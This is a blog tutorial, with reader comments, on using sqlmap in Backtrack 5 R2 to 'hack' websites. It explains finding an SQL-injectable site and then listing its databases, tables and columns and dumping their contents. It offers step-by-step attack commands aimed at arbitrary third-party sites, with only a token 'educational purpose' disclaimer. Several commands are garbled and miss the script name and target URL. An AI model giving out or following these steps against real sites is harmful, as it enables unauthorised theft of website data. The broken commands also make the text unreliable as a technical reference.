How to hack website by Sqlmap-Backtrack 5 R2

Today i'm gonna tell you how to use Sqlmap in Backtrack 5 R2.
In this tutorial i'll only tell you the basic usage of Sqlmap.

Before we begin, I assume that, those users who are reading this article, knows how to find sql vulnerable sites.If you are new to it, we have a separate SQL Injection Blog, please Do Visit :- 

So now lets begin:-

  • First find a sql vulnerable site.
  • Then open your sqlmap. This would look something like this:

  • To find the databases,type python -u --dbs
  1. -u is used to denote the url
  2. --dbs is used to find database of the site

  • Then hit Enter Button. This would look something like this

  • Then if the site is vulnerable, this will show the database of the website.

  • To find the current database type  python -u --current-db .Then hit Enter.
  1. --current-db this is used to find current database used by the site.

  • After that, to find the tables of a database, type  python -u -D database_name --tables
  1. -D is used for taking a specific database.
  2. --tables is used for find the tables of a specific database. See the image

  • This will shows all the tables of a database.

  • Then, to find columns of a particular table, type python -u -D database_name -T table_name --columns
  1. -T is used for taking a specific table
  2. --columns is used for finding columns

  • Now we have come to final steps, till now we have found database, tables, and columns. This time we dump columns.
  • To dump columns, type  python -u -D database_name -T table_name -C column_name --dump
  1. -C is used for taking a specific column or columns. You can dump one columns or more than one columns by putting comma like this:- -C column_name1, column_name2, column_name3 etc.
  2. --dump is used for dumping column or columns at a time. You will understand this by seeing the image

  • Now you have successfully done !!
This is only for educational purpose, we are not responsible for any illegal activity done by you
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!


  1. This comment has been removed by a blog administrator.

  2. good job i like it

  3. This commend -C column_name1, column_name2, column_name3 etc. I think only work for max 4 columns because i tried to get 5 columns with this and doesn't work , only retrieve first column